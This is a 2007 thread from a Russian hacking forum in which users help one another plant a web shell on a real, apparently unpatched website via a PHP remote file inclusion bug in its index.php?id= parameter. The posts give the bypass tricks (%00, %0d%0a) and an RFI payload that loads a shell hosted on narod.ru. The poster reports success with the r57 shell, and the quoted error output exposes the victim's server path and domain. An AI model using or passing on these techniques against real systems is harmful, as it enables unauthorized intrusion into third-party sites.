ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Простой баг
  #1  
Старый 13.07.2007, 06:53
Аватар для George767
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876

Репутация: 81
По умолчанию Простой баг

Есть бажный похоже самодельный форум, пропускает и парсит хтмл в ссылках вида index.php?id=
Есть идеи как туда можно шел залить?

PS Подставляет .html после введеного, так что на внешнюю завести нельзя

Спасибо
 
Ответить с цитированием

  #2  
Старый 13.07.2007, 07:02
Аватар для iv.
iv.
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию

Цитата:
Подставляет .html после введеного, так что на внешнюю завести нельзя
%00 не помогает? Или же %0d%0a?
 
Ответить с цитированием

  #3  
Старый 13.07.2007, 08:08
Аватар для George767
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876

Репутация: 81
По умолчанию

Помогает - ставит пробел, но что с этим можно сделать?
Вот что выдает
Warning: main( .htm): failed to open stream: No such file or directory in /hsphere/local/home/asvideor/XXX/index.php on line 241 Warning: main( .htm): failed to open stream: No such file or directory in /hsphere/local/home/asvideor/XXX/index.php on line 241 Warning: main(): Failed opening ' .htm' for inclusion (include_path='.:/hsphere/shared/apache/libexec/php4ext/php/') in /hsphere/local/home/asvideor/va-utair.ru/index.php on line 241
 
Ответить с цитированием

  #4  
Старый 13.07.2007, 09:11
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Цитата:
Подставляет .html после введеного, так что на внешнюю завести нельзя
Почему нельзя? Залей на народ shell.html и подставляй тогда
Код:
index.php?id=http://www.site.narod.ru/shell
 
Ответить с цитированием

  #5  
Старый 13.07.2007, 10:20
Аватар для George767
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876

Репутация: 81
По умолчанию

Цитата:
Сообщение от The_HuliGun  
Почему нельзя? Залей на народ shell.html и подставляй тогда
Код:
index.php?id=http://www.site.narod.ru/shell
Получилось открыть внешний файл через такую конструкцию:

index.php?id=внешняя_ссылка/%0d%0a

Но файл-же не заливается на их фтп, я вижу через r57 содержимое моего сервака...

Последний раз редактировалось George767; 13.07.2007 в 10:24..
 
Ответить с цитированием

  #6  
Старый 13.07.2007, 13:13
Аватар для n-000
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411

Репутация: 91
Отправить сообщение для n-000 с помощью ICQ
По умолчанию

а как насчёт ссылочки на форум ?
Если не хочеш выкладывать ссылу в паблик пришли в приват, как у мя будет время покапаюсь...

Последний раз редактировалось n-000; 13.07.2007 в 13:19..
 
Ответить с цитированием

  #7  
Старый 13.07.2007, 13:18
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

шелл должен быть залит там, где нет поддержки php, например на народ.ру
 
Ответить с цитированием

  #8  
Старый 13.07.2007, 13:22
Аватар для n-000
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411

Репутация: 91
Отправить сообщение для n-000 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Rebz  
шелл должен быть залит там, где нет поддержки php, например на народ.ру
Да не фсегда, можно и в *.txt формате шелл на сервере хранить, но это только если этот txt будет запускаца инклудом
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Самый простой взлом. Azazel Болталка 30 14.07.2007 01:09
Пишем быстро простой бэкдор на основе idHTTPServer begin_end Авторские статьи 2 09.04.2007 02:21
Старый баг с апгрейд скриптом в булке (сканер) gemaglabin Форумы 7 01.09.2006 21:11
Самый ЛоЛьский Баг (XSS in Art-Soft Гостевая книга v 2.0.1) _kREveDKo_ Форумы 4 15.08.2006 17:04
Баг чата Бородина: chat.php.spb.ru (предположение) VIA Чаты 14 28.02.2006 19:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ